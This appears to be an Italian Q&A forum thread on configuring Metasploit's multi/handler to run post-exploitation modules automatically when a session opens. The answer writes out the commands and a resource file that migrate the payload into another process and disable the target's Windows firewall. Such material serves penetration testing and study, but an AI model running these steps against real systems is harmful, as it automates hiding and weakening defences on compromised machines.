Dopo aver letto un paio di pagine web che si riferiscono a metasploit, mi sono imbattuto in un post che si riferisce all'esecuzione automatica di moduli metasploit sulla ricezione di una shell. Vale a dire il modulo post exploitation, smart-migrate.
È comunque possibile modificare i file di configurazione in modo che ciò accada?
Grazie per tutto il tuo aiuto !!!
Il gestore ha un'opzione AutoRunScript che specifica cosa succede quando viene ricevuta una sessione. Puoi dargli lo script multi_console_command che sarà in grado di eseguire più moduli post e meterpreter durante la sessione di ricezione.
Ad esempio, per eseguire i moduli smart_migrate e killfw post:
msf > use exploit/multi/handler
msf (handler) > set AutoRunScript multi_console_command -rc /root/mycommands.rb
I contenuti di /root/mycommands.rb includono:
root@kali# cat /root/mycommands.rb
run post/windows/manage/smart_migrate
run post/windows/manage/killfw
Leggi altre domande sui tag metasploit